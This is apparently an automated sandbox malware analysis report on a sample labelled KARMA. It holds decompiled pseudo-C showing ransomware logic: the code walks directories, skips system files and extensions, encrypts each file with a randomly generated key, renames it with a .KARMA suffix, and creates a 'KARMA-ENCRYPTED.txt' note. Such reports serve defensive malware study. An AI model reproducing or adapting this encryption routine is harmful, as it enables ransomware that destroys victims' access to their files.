MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 06:00:56
Start date: 19/08/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 400
Imagebase: 0xe80000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis

Execution Graph

Execution Coverage: 41.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 47.9%
Total number of Nodes: 121
Total number of Limit Nodes: 17

[Figure: execution graph]

Callgraph

[Figure: callgraph. Legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available]

Executed Functions

Control-flow Graph

[Figure: control-flow graph of function 00402760. Legend: Executed, Not Executed]

C-Code - Quality: 86%
			E00402760(WCHAR* __ecx) {
				WCHAR* _v528;
				long _v532;
				short _v548;
				void* _v552;
				long _v556;
				union _LARGE_INTEGER* _v560;
				long _v564;
				void* _v568;
				long _v572;
				void* _v576;
				long _v580;
				void* _v584;
				intOrPtr _v588;
				union _LARGE_INTEGER* _v592;
				union _LARGE_INTEGER _v596;
				union _LARGE_INTEGER* _v600;
				void* _v604;
				void* _v612;
				void* _v616;
				int _t113;
				void* _t124;
				_Unknown_base(*)()* _t125;
				intOrPtr _t127;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				long _t157;
				long _t159;
				void* _t161;
				void* _t171;
				void* _t173;
				intOrPtr _t185;
				struct HINSTANCE__* _t190;
				void* _t194;
				void* _t196;
				void* _t197;
				long _t199;
				struct HINSTANCE__* _t200;
				void* _t201;
				unsigned int _t202;
				void* _t204;
				void* _t205;
				signed int* _t207;
				signed short* _t208;
				signed int* _t209;
				signed short* _t210;
				signed int* _t211;
				intOrPtr* _t214;
				union _LARGE_INTEGER* _t216;
				void* _t219;
				unsigned int _t220;
				intOrPtr* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				void* _t229;
				signed short* _t230;
				signed short* _t231;
				union _LARGE_INTEGER* _t233;
				signed int _t234;
				void* _t235;
				void* _t238;
				union _LARGE_INTEGER* _t240;
				union _LARGE_INTEGER _t241;
				unsigned int _t242;
				void* _t246;
				intOrPtr* _t247;
				WCHAR* _t249;
				union _LARGE_INTEGER _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				intOrPtr _t254;
				intOrPtr _t255;
				signed int _t256;
				void* _t258;
				void* _t259;
				union _LARGE_INTEGER* _t291;
				union _LARGE_INTEGER* _t293;
				void* _t295;

				_t258 = (_t256 & 0xfffffff8) - 0x244;
				_v532 = 0;
				_v528 = __ecx;
				_t113 = CreateFileW(__ecx, 0xc0000000, 0, 0, 3, 0, 0); // executed
				_t238 = _t113;
				_v580 = _t238;
				if(_t238 != 0) {
					__imp__GetFileSizeEx(_t238,  &_v572);
					_t224 =  *0x406000;
					_t199 = 0;
					if( *_t224 != 0) {
						do {
							_t199 = _t199 + 1;
						} while ( *((char*)(_t224 + _t199)) != 0);
					}
					_v552 = HeapAlloc(GetProcessHeap(), 0, _t199);
					_v568 = HeapAlloc(GetProcessHeap(), 0, 8);
					_v564 = HeapAlloc(GetProcessHeap(), 0, 0x40);
					_t194 = HeapAlloc(GetProcessHeap(), 0, 0x40);
					_v584 = _t194;
					_t124 = HeapAlloc(GetProcessHeap(), 0, 0x20);
					_t200 =  *0x406014;
					_t246 = _t124;
					_v560 = _t246;
					if(_t200 == 0) {
						_t190 = LoadLibraryW(L"bcrypt.dll"); // executed
						_t200 = _t190;
						 *0x406014 = _t200;
					}
					_t125 =  *0x40600c;
					if(_t125 == 0) {
						_t125 = GetProcAddress(_t200, "BCryptGenRandom");
						 *0x40600c = _t125;
					}
					 *_t125(0, _t246, 0x20, 2); // executed
					 *_t194 = 0x71fd558b;
					_t11 = _t246 + 0x20; // 0x20
					_t201 = _t11;
					 *((intOrPtr*)(_t194 + 4)) = 0xf8f8eb73;
					_t127 = 0x100;
					 *((intOrPtr*)(_t194 + 8)) = 0x391f8b36;
					 *((intOrPtr*)(_t194 + 0xc)) = 0x5fef65bc;
					 *((intOrPtr*)(_t194 + 0x10)) = 0x39f1bb75;
					 *((intOrPtr*)(_t194 + 0x14)) = 0x8313bb21;
					 *((intOrPtr*)(_t194 + 0x18)) = 0xc9dfcbac;
					 *((intOrPtr*)(_t194 + 0x1c)) = 0xfa;
					 *((intOrPtr*)(_t194 + 0x20)) = 0x1f81052;
					 *((intOrPtr*)(_t194 + 0x24)) = 0x36716f7e;
					 *((intOrPtr*)(_t194 + 0x28)) = 0xf867a7ca;
					 *((intOrPtr*)(_t194 + 0x2c)) = 0xbf8a0bef;
					 *((intOrPtr*)(_t194 + 0x30)) = 0xe58528be;
					 *((intOrPtr*)(_t194 + 0x34)) = 0x3350678;
					 *((intOrPtr*)(_t194 + 0x38)) = 0x6a08a419;
					 *((intOrPtr*)(_t194 + 0x3c)) = 0x100;
					while(1) {
						_t225 =  *(_t201 - 4);
						_t201 = _t201 - 4;
						if(_t225 != 0) {
							break;
						}
						_t127 = _t127 - 0x20;
						_t255 = _t127;
						if(_t127 > 0) {
							continue;
						} else {
							if(_t255 != 0) {
								break;
							}
						}
						L24:
						E004019E0(_v576, _v580);
						_t247 =  *0x406000;
						_t226 = 0;
						_t259 = _t258 + 4;
						if( *_t247 != 0) {
							do {
								_t226 = _t226 + 1;
							} while ( *((char*)(_t247 + _t226)) != 0);
						}
						_t204 = 0;
						if(_t226 != 0) {
							_t197 = _v568;
							do {
								 *((char*)(_t204 + _t197)) =  *((intOrPtr*)(_t204 + _t247));
								_t204 = _t204 + 1;
							} while (_t204 < _t226);
							_t194 = _v600;
						}
						_t227 = 0;
						do {
							_t227 = _t227 + 1;
						} while ( *((char*)(_t227 + "11111111")) != 0);
						_t205 = 0;
						if(_t227 != 0) {
							_t252 = _v584;
							asm("o16 nop [eax+eax]");
							do {
								_t50 = _t205 + "11111111"; // 0x31313131
								 *((char*)(_t205 + _t252)) =  *_t50;
								_t205 = _t205 + 1;
							} while (_t205 < _t227);
						}
						_push(0);
						SetFilePointerEx(_t238, _v596.LowPart, _v592, 0); // executed
						SetLastError(0);
						WriteFile(_t238, _t194, 0x40,  &_v572, 0); // executed
						if(GetLastError() != 6 && GetLastError() != 0x13) {
							_push(0);
							asm("adc eax, 0x0");
							SetFilePointerEx(_t238, _v596.LowPart + 0x40, _v592, 0); // executed
							_t214 =  *0x406000;
							_t157 = 0;
							if( *_t214 != 0) {
								do {
									_t157 = _t157 + 1;
								} while ( *((char*)(_t157 + _t214)) != 0);
							}
							WriteFile(_t238, _v568, _t157,  &_v572, 0); // executed
							_t216 = _v592;
							_t159 = _v596.LowPart;
							_t291 = _t216;
							if(_t291 < 0 || _t291 <= 0 && _t159 <= 0x124f80) {
								_t161 = RtlAllocateHeap(GetProcessHeap(), 0, _t159); // executed
								_push(0);
								asm("xorps xmm0, xmm0");
								_t196 = _t161;
								asm("movlpd [esp+0x3c], xmm0");
								_t240 = _v568;
								_t250 = _v572;
								SetFilePointerEx(_v612, _t250, _t240, 0); // executed
								ReadFile(_v612, _t196, _v604,  &_v564, 0); // executed
								E00403A60(_v588, _v592, _t216, _t196, _v604);
								_push(0);
								_t238 = _v612;
								SetFilePointerEx(_t238, _t250, _t240, 0); // executed
								WriteFile(_t238, _t196, _v604,  &_v580, 0); // executed
								RtlFreeHeap(GetProcessHeap(), 0, _t196); // executed
								_t194 = _v616;
							} else {
								asm("xorps xmm0, xmm0");
								asm("movlpd [esp+0x38], xmm0");
								_t293 = _t216;
								if(_t293 >= 0 && (_t293 > 0 || _t159 != 0)) {
									_t241 = _v564;
									_v600 = _v560;
									while(1) {
										_t171 = _t159 - _t241;
										_t295 = _t171;
										asm("sbb ecx, edx");
										_v560 = _t216;
										if(_t295 < 0 || _t295 <= 0 && _t171 < 0x27100) {
											break;
										}
										_t173 = HeapAlloc(GetProcessHeap(), 0, 0x27100);
										_push(0);
										_t251 = _t173;
										SetFilePointerEx(_v604, _t241, _v600, 0); // executed
										ReadFile(_v604, _t251, 0x27100,  &_v556, 0); // executed
										E00403A60(_v580, _v584, _t216, _t251, 0x27100);
										_t259 = _t259 + 0x10;
										_push(0);
										SetFilePointerEx(_v604, _t241, _v600, 0); // executed
										WriteFile(_v604, _t251, 0x27100,  &_v572, 0); // executed
										HeapFree(GetProcessHeap(), 0, _t251);
										_t233 = _v600;
										_t241 = _t241 + 0x4e200;
										_t216 = _v592;
										asm("adc edx, 0x0");
										_v600 = _t233;
										if(_t233 >= _t216) {
											if(__eflags <= 0) {
												_t159 = _v596.LowPart;
												__eflags = _t241 - _t159;
												if(_t241 < _t159) {
													continue;
												}
											}
										} else {
											_t159 = _v596;
											continue;
										}
										break;
									}
									_t238 = _v604;
								}
							}
						}
						HeapFree(GetProcessHeap(), 0, _v568);
						HeapFree(GetProcessHeap(), 0, _v584);
						HeapFree(GetProcessHeap(), 0, _v580);
						HeapFree(GetProcessHeap(), 0, _t194);
						HeapFree(GetProcessHeap(), 0, _v576);
						FindCloseChangeNotification(_t238); // executed
						_t249 = _v552;
						_t207 =  &_v548 - 2;
						_t229 = (_t249 -  &_v548 >> 1) + 1 + (_t249 -  &_v548 >> 1) + 1;
						asm("o16 nop [eax+eax]");
						do {
							_t148 =  *(_t207 + _t229) & 0x0000ffff;
							_t207 =  &(_t207[0]);
							 *_t207 = _t148;
							__eflags = _t148;
						} while (_t148 != 0);
						_t208 =  &_v548;
						_t230 = ".";
						do {
							_t149 =  *_t208 & 0x0000ffff;
							_t208 =  &(_t208[1]);
							__eflags = _t149;
						} while (_t149 != 0);
						_t209 = _t208 - 4;
						__eflags = _t209;
						do {
							_t150 =  *_t230 & 0x0000ffff;
							_t209 =  &(_t209[0]);
							 *_t209 = _t150;
							_t94 =  &(_t230[1]); // 0x2a0000
							_t230 = _t94;
							__eflags = _t150;
						} while (_t150 != 0);
						_t210 =  &_v548;
						_t231 = L"KARMA";
						asm("o16 nop [eax+eax]");
						do {
							_t151 =  *_t210 & 0x0000ffff;
							_t210 =  &(_t210[1]);
							__eflags = _t151;
						} while (_t151 != 0);
						_t211 = _t210 - 4;
						__eflags = _t211;
						do {
							_t152 =  *_t231 & 0x0000ffff;
							_t211 =  &(_t211[0]);
							 *_t211 = _t152;
							_t231 =  &(_t231[1]);
							__eflags = _t152;
						} while (_t152 != 0);
						_t113 = MoveFileW(_t249,  &_v548); // executed
						goto L66;
					}
					_t202 = 0x80000000;
					if(_t225 >= 0) {
						do {
							_t202 = _t202 >> 1;
							_t127 = _t127 - 1;
						} while ((_t202 & _t225) == 0);
					}
					if(_t127 >= 0x74) {
						_t185 = 0x100;
						_t219 = 0x404150;
						while(1) {
							_t31 = _t219 - 4; // 0x100
							_t234 =  *_t31;
							_t32 = _t219 - 4; // 0x100
							_t219 = _t32;
							if(_t234 != 0) {
								break;
							}
							_t185 = _t185 - 0x20;
							_t254 = _t185;
							if(_t185 > 0) {
								continue;
							} else {
								if(_t254 != 0) {
									break;
								}
							}
							L21:
							_t235 = _v576;
							_t36 = _t185 - 1; // 0xfe
							_t242 = _t36;
							while(_t242 < 0x100) {
								_t253 = _t235 + (_t242 >> 5) * 4;
								_t242 = _t242 + 1;
								asm("btr eax, ecx");
							}
							_t39 = _t194 + 0x20; // 0x20
							E004018C0(_t194, _t39, _t235);
							_t238 = _v604;
							_t258 = _t258 + 4;
							goto L24;
						}
						_t220 = 0x80000000;
						if(_t234 >= 0) {
							do {
								_t220 = _t220 >> 1;
								_t185 = _t185 - 1;
							} while ((_t220 & _t234) == 0);
						}
						goto L21;
					}
					goto L24;
				}
				L66:
				return _t113;
			}

APIs
  • CreateFileW.KERNELBASE(?,C0000000), ref: 0040278D
  • GetFileSizeEx.KERNEL32(00000000,00000003), ref: 004027A7
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004027D0
  • HeapAlloc.KERNEL32(00000000), ref: 004027D9
  • GetProcessHeap.KERNEL32(00000000,00000008), ref: 004027E3
  • HeapAlloc.KERNEL32(00000000), ref: 004027E6
  • GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027F0
  • HeapAlloc.KERNEL32(00000000), ref: 004027F3
  • GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027FD
  • HeapAlloc.KERNEL32(00000000), ref: 00402800
  • GetProcessHeap.KERNEL32(00000000,00000020), ref: 0040280C
  • HeapAlloc.KERNEL32(00000000), ref: 0040280F
  • LoadLibraryW.KERNELBASE(bcrypt.dll), ref: 0040282A
  • GetProcAddress.KERNEL32(?,BCryptGenRandom), ref: 00402847
  • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000000), ref: 004029EB
  • SetLastError.KERNEL32(00000000), ref: 004029F3
  • WriteFile.KERNELBASE(00000000,00000000,00000040,?,00000000), ref: 00402A04
  • GetLastError.KERNEL32 ref: 00402A10
  • GetLastError.KERNEL32 ref: 00402A1B
  • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000000), ref: 00402A3B
  • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402A64
  • GetProcessHeap.KERNEL32(00000000,00027100), ref: 00402AD2
  • HeapAlloc.KERNEL32(00000000), ref: 00402AD9
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402AEE
  • ReadFile.KERNELBASE(?,00000000,00027100,?,00000000), ref: 00402B05
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402B2F
  • WriteFile.KERNELBASE(?,00000000,00027100,?,00000000), ref: 00402B46
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B4F
  • HeapFree.KERNEL32(00000000), ref: 00402B56
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402B96
  • HeapFree.KERNEL32(00000000), ref: 00402B9D
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402BA9
  • HeapFree.KERNEL32(00000000), ref: 00402BB0
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402BBC
  • HeapFree.KERNEL32(00000000), ref: 00402BC3
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BCC
  • HeapFree.KERNEL32(00000000), ref: 00402BD9
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402BE1
  • HeapFree.KERNEL32(00000000), ref: 00402BE8
  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402BEB
  • MoveFileW.KERNEL32(?,?), ref: 00402C87
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402C97
  • RtlAllocateHeap.NTDLL(00000000), ref: 00402C9E
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402CC1
  • ReadFile.KERNELBASE(?,00000000,?,?,00000000), ref: 00402CD7
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402CFE
  • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 00402D11
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402D1A
  • RtlFreeHeap.NTDLL(00000000), ref: 00402D21
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: Heap$File$Process$Free$AllocPointer$Write$ErrorLast$Read$AddressAllocateChangeCloseCreateFindLibraryLoadMoveNotificationProcSize
  • String ID: BCryptGenRandom$KARMA$PA@$bcrypt.dll$~oq6
  • API String ID: 3347413512-326148691
  • Opcode ID: a0a8443f111ba0c3258b1b3ee9450da8c50392a43b65958ef60d2d9905106ff1
  • Instruction ID: fe2765e49ddf6a15f23341d42f34b0edb02b26a7ae89cd84e9e8fe6f68251d08
  • Opcode Fuzzy Hash: a0a8443f111ba0c3258b1b3ee9450da8c50392a43b65958ef60d2d9905106ff1
  • Instruction Fuzzy Hash: 45F19CB1604301AFE7149F64CE48B2B7BA4EFC9704F14452DFB85BA2E1DBB99801CB59
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E00402D30(intOrPtr __ecx) {
				short _v524;
				char _v1044;
				short _v1564;
				struct _WIN32_FIND_DATAW _v2156;
				long _v2160;
				intOrPtr _v2168;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				void* _t221;
				int _t224;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed short _t232;
				signed int _t234;
				int _t246;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed short _t285;
				char* _t288;
				signed int _t289;
				int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t318;
				signed short* _t319;
				signed int* _t320;
				signed int* _t322;
				signed short* _t323;
				signed int* _t324;
				signed short* _t325;
				signed int* _t326;
				signed int* _t328;
				signed short* _t329;
				signed int* _t330;
				char* _t331;
				void* _t336;
				signed int* _t414;
				signed short* _t415;
				signed int* _t416;
				signed short* _t417;
				signed int* _t418;
				signed int _t422;
				signed int _t423;
				long _t424;
				signed int* _t426;
				signed short* _t427;
				void* _t429;
				char* _t430;
				char* _t431;
				void* _t433;
				signed short* _t434;
				signed int* _t436;
				void* _t476;
				signed short* _t477;
				char* _t478;
				void* _t481;
				signed int _t482;
				void* _t483;
				intOrPtr _t485;
				void* _t487;
				void* _t488;
				void* _t489;
				void* _t490;
				void* _t491;
				char* _t492;
				void* _t493;
				void* _t494;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t498;
				void* _t499;
				void* _t500;
				void* _t501;
				void* _t502;
				void* _t503;
				void* _t504;
				void* _t505;
				void* _t506;
				void* _t508;
				long _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				void* _t531;
				signed int _t532;
				void* _t534;

				_t534 = (_t532 & 0xfffffff8) - 0x874;
				_t485 = __ecx;
				_v2168 = __ecx;
				_t426 =  &_v524 - 2;
				_t318 = (__ecx -  &_v524 >> 1) + 1 + (__ecx -  &_v524 >> 1) + 1;
				do {
					_t208 =  *(_t318 + _t426) & 0x0000ffff;
					_t426 =  &(_t426[0]);
					 *_t426 = _t208;
				} while (_t208 != 0);
				_t319 =  &_v524;
				_t427 = L"*.*";
				do {
					_t209 =  *_t319 & 0x0000ffff;
					_t319 =  &(_t319[1]);
				} while (_t209 != 0);
				_t320 = _t319 - 4;
				do {
					_t210 =  *_t427 & 0x0000ffff;
					_t320 =  &(_t320[0]);
					 *_t320 = _t210;
					_t427 =  &(_t427[1]);
				} while (_t210 != 0);
				_t322 =  &_v1564 - 2;
				_t429 = (__ecx -  &_v1564 >> 1) + 1 + (__ecx -  &_v1564 >> 1) + 1;
				do {
					_t215 =  *(_t429 + _t322) & 0x0000ffff;
					_t322 =  &(_t322[0]);
					 *_t322 = _t215;
				} while (_t215 != 0);
				_t323 =  &_v1564;
				_t430 = L"KARMA";
				do {
					_t216 =  *_t323 & 0x0000ffff;
					_t323 =  &(_t323[1]);
				} while (_t216 != 0);
				_t324 = _t323 - 4;
				do {
					_t217 =  *_t430 & 0x0000ffff;
					_t324 =  &(_t324[0]);
					 *_t324 = _t217;
					_t430 =  &(_t430[2]);
				} while (_t217 != 0);
				_t325 =  &_v1564;
				_t431 = L"-ENCRYPTED.txt";
				do {
					_t218 =  *_t325 & 0x0000ffff;
					_t325 =  &(_t325[1]);
				} while (_t218 != 0);
				_t326 = _t325 - 4;
				do {
					_t219 =  *_t431 & 0x0000ffff;
					_t326 =  &(_t326[0]);
					 *_t326 = _t219;
					_t431 =  &(_t431[2]);
				} while (_t219 != 0);
				_t221 = CreateFileW( &_v1564, 0xc0000000, 0, 0, 2, 0, 0); // executed
				_t508 = _t221;
				if(_t508 == 0) {
					L20:
					_t224 = FindFirstFileW( &_v524,  &_v2156); // executed
					_t294 = _t224;
					_v2160 = _t294;
					if(_t294 == 0xffffffff) {
						L139:
						return _t224;
					}
					do {
						if((_v2156.dwFileAttributes & 0x00000010) == 0) {
							_t328 =  &_v1044 - 2;
							_t433 = (_t485 -  &_v1044 >> 1) + 1 + (_t485 -  &_v1044 >> 1) + 1;
							do {
								_t229 =  *(_t433 + _t328) & 0x0000ffff;
								_t328 =  &(_t328[0]);
								 *_t328 = _t229;
							} while (_t229 != 0);
							_t329 =  &_v1044;
							_t434 =  &(_v2156.cFileName);
							asm("o16 nop [eax+eax]");
							do {
								_t230 =  *_t329 & 0x0000ffff;
								_t329 =  &(_t329[1]);
							} while (_t230 != 0);
							_t330 = _t329 - 4;
							do {
								_t231 =  *_t434 & 0x0000ffff;
								_t330 =  &(_t330[0]);
								 *_t330 = _t231;
								_t434 =  &(_t434[1]);
							} while (_t231 != 0);
							_t232 = _v2156.cFileName;
							_t331 =  &(_v2156.cFileName);
							_t510 = 0;
							if(_t232 == 0) {
								L104:
								_t436 =  &_v1564 - 2;
								_t332 =  !=  ? _t510 : _t331;
								_t333 = ( !=  ? _t510 : _t331) -  &_v1564;
								_t334 = ( !=  ? _t510 : _t331) -  &_v1564 >> 1;
								_t335 = (( !=  ? _t510 : _t331) -  &_v1564 >> 1) + 1;
								_t336 = (( !=  ? _t510 : _t331) -  &_v1564 >> 1) + 1 + (( !=  ? _t510 : _t331) -  &_v1564 >> 1) + 1;
								asm("o16 nop [eax+eax]");
								do {
									_t234 =  *(_t336 + _t436) & 0x0000ffff;
									_t436 =  &(_t436[0]);
									 *_t436 = _t234;
								} while (_t234 != 0);
								_t487 = 0;
								while(1) {
									_t159 = _t487 + L".exe"; // 0x2e0000
									_t337 =  *_t159 & 0x0000ffff;
									_t296 =  *(_t534 + _t487 + 0x268) & 0x0000ffff;
									_t511 = _t296;
									_t163 = _t337 + 0x20; // 0x2e0020
									_t438 =  >  ?  *_t159 & 0x0000ffff : _t163;
									_t339 =  >  ? _t511 : _t511 + 0x20;
									_t340 = ( >  ? _t511 : _t511 + 0x20) != ( >  ?  *_t159 & 0x0000ffff : _t163);
									__eflags = ( >  ? _t511 : _t511 + 0x20) != ( >  ?  *_t159 & 0x0000ffff : _t163);
									if(( >  ? _t511 : _t511 + 0x20) != ( >  ?  *_t159 & 0x0000ffff : _t163)) {
										break;
									}
									if(_t296 == 0) {
										L136:
										_t485 = _v2168;
										goto L137;
									}
									_t487 = _t487 + 2;
								}
								_t488 = 0;
								while(1) {
									_t166 = _t488 + L".ini"; // 0x2e0000
									_t341 =  *_t166 & 0x0000ffff;
									_t297 =  *(_t534 + _t488 + 0x268) & 0x0000ffff;
									_t512 = _t297;
									_t170 = _t341 + 0x20; // 0x2e0020
									_t440 =  >  ?  *_t166 & 0x0000ffff : _t170;
									_t343 =  >  ? _t512 : _t512 + 0x20;
									_t344 = ( >  ? _t512 : _t512 + 0x20) != ( >  ?  *_t166 & 0x0000ffff : _t170);
									__eflags = ( >  ? _t512 : _t512 + 0x20) != ( >  ?  *_t166 & 0x0000ffff : _t170);
									if(( >  ? _t512 : _t512 + 0x20) != ( >  ?  *_t166 & 0x0000ffff : _t170)) {
										break;
									}
									if(_t297 == 0) {
										goto L136;
									}
									_t488 = _t488 + 2;
								}
								_t489 = 0;
								while(1) {
									_t173 = _t489 + L".dll"; // 0x2e0000
									_t345 =  *_t173 & 0x0000ffff;
									_t298 =  *(_t534 + _t489 + 0x268) & 0x0000ffff;
									_t513 = _t298;
									_t177 = _t345 + 0x20; // 0x2e0020
									_t442 =  >  ?  *_t173 & 0x0000ffff : _t177;
									_t347 =  >  ? _t513 : _t513 + 0x20;
									_t348 = ( >  ? _t513 : _t513 + 0x20) != ( >  ?  *_t173 & 0x0000ffff : _t177);
									__eflags = ( >  ? _t513 : _t513 + 0x20) != ( >  ?  *_t173 & 0x0000ffff : _t177);
									if(( >  ? _t513 : _t513 + 0x20) != ( >  ?  *_t173 & 0x0000ffff : _t177)) {
										break;
									}
									if(_t298 == 0) {
										goto L136;
									}
									_t489 = _t489 + 2;
								}
								_t490 = 0;
								while(1) {
									_t180 = _t490 + L".url"; // 0x2e0000
									_t349 =  *_t180 & 0x0000ffff;
									_t299 =  *(_t534 + _t490 + 0x268) & 0x0000ffff;
									_t514 = _t299;
									_t184 = _t349 + 0x20; // 0x2e0020
									_t444 =  >  ?  *_t180 & 0x0000ffff : _t184;
									_t351 =  >  ? _t514 : _t514 + 0x20;
									_t352 = ( >  ? _t514 : _t514 + 0x20) != ( >  ?  *_t180 & 0x0000ffff : _t184);
									__eflags = ( >  ? _t514 : _t514 + 0x20) != ( >  ?  *_t180 & 0x0000ffff : _t184);
									if(( >  ? _t514 : _t514 + 0x20) != ( >  ?  *_t180 & 0x0000ffff : _t184)) {
										break;
									}
									if(_t299 == 0) {
										goto L136;
									}
									_t490 = _t490 + 2;
								}
								_t491 = 0;
								while(1) {
									_t187 = _t491 + L".lnk"; // 0x2e0000
									_t353 =  *_t187 & 0x0000ffff;
									_t300 =  *(_t534 + _t491 + 0x268) & 0x0000ffff;
									_t515 = _t300;
									_t191 = _t353 + 0x20; // 0x2e0020
									_t446 =  >  ?  *_t187 & 0x0000ffff : _t191;
									_t355 =  >  ? _t515 : _t515 + 0x20;
									_t356 = ( >  ? _t515 : _t515 + 0x20) != ( >  ?  *_t187 & 0x0000ffff : _t191);
									__eflags = ( >  ? _t515 : _t515 + 0x20) != ( >  ?  *_t187 & 0x0000ffff : _t191);
									if(( >  ? _t515 : _t515 + 0x20) != ( >  ?  *_t187 & 0x0000ffff : _t191)) {
										break;
									}
									if(_t300 == 0) {
										goto L136;
									}
									_t491 = _t491 + 2;
								}
								_t492 =  &(_v2156.cFileName);
								if(L"KARMA" == 0) {
									goto L136;
								}
								_t285 = _v2156.cFileName;
								if(_t285 == 0) {
									L135:
									E004021B0(L"[+] File: ",  &_v1044); // executed
									E00402760( &_v1044); // executed
									goto L136;
								}
								_t422 = _t285 & 0x0000ffff;
								_t531 = _t492 - L"KARMA";
								do {
									_t288 = L"KARMA";
									if(_t422 == 0) {
										L133:
										if( *_t288 == 0) {
											goto L136;
										}
										goto L134;
									} else {
										goto L130;
									}
									while(1) {
										L130:
										_t423 =  *_t288 & 0x0000ffff;
										if(_t423 == 0) {
											goto L136;
										}
										_t481 = ( *(_t531 + _t288) & 0x0000ffff) - _t423;
										if(_t481 != 0) {
											goto L133;
										}
										_t288 =  &(_t288[2]);
										if( *(_t531 + _t288) != _t481) {
											continue;
										}
										goto L133;
									}
									goto L136;
									L134:
									_t422 =  *(_t492 + 2) & 0x0000ffff;
									_t492 = _t492 + 2;
									_t531 = _t531 + 2;
								} while (_t422 != 0);
								goto L135;
							}
							_t482 = _t232 & 0x0000ffff;
							do {
								if(_t482 == 0x5c || _t482 == 0x20) {
									_t510 = 0;
								} else {
									if(_t482 == 0x2e) {
										_t510 = _t331;
									}
								}
								_t289 =  *(_t331 + 2) & 0x0000ffff;
								_t331 = _t331 + 2;
								_t482 = _t289;
							} while (_t289 != 0);
							goto L104;
						}
						_t493 = 0;
						while(1) {
							_t31 = _t493 + "."; // 0x2e0000
							_t357 =  *_t31 & 0x0000ffff;
							_t302 =  *(_t534 + _t493 + 0x44) & 0x0000ffff;
							_t516 = _t302;
							_t35 = _t357 + 0x20; // 0x2e0020
							_t448 =  >  ?  *_t31 & 0x0000ffff : _t35;
							_t359 =  >  ? _t516 : _t516 + 0x20;
							_t360 = ( >  ? _t516 : _t516 + 0x20) != ( >  ?  *_t31 & 0x0000ffff : _t35);
							_t556 = ( >  ? _t516 : _t516 + 0x20) != ( >  ?  *_t31 & 0x0000ffff : _t35);
							if(( >  ? _t516 : _t516 + 0x20) != ( >  ?  *_t31 & 0x0000ffff : _t35)) {
								break;
							}
							if(_t302 == 0) {
								goto L136;
							}
							_t493 = _t493 + 2;
						}
						_t494 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t38 = _t494 + L".."; // 0x2e0000
							_t361 =  *_t38 & 0x0000ffff;
							_t303 =  *(_t534 + _t494 + 0x44) & 0x0000ffff;
							_t517 = _t303;
							_t42 = _t361 + 0x20; // 0x2e0020
							_t450 =  >  ?  *_t38 & 0x0000ffff : _t42;
							_t363 =  >  ? _t517 : _t517 + 0x20;
							_t364 = ( >  ? _t517 : _t517 + 0x20) != ( >  ?  *_t38 & 0x0000ffff : _t42);
							__eflags = ( >  ? _t517 : _t517 + 0x20) != ( >  ?  *_t38 & 0x0000ffff : _t42);
							if(( >  ? _t517 : _t517 + 0x20) != ( >  ?  *_t38 & 0x0000ffff : _t42)) {
								break;
							}
							if(_t303 == 0) {
								goto L136;
							}
							_t494 = _t494 + 2;
						}
						_t495 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t45 = _t495 + L"windows"; // 0x770000
							_t365 =  *_t45 & 0x0000ffff;
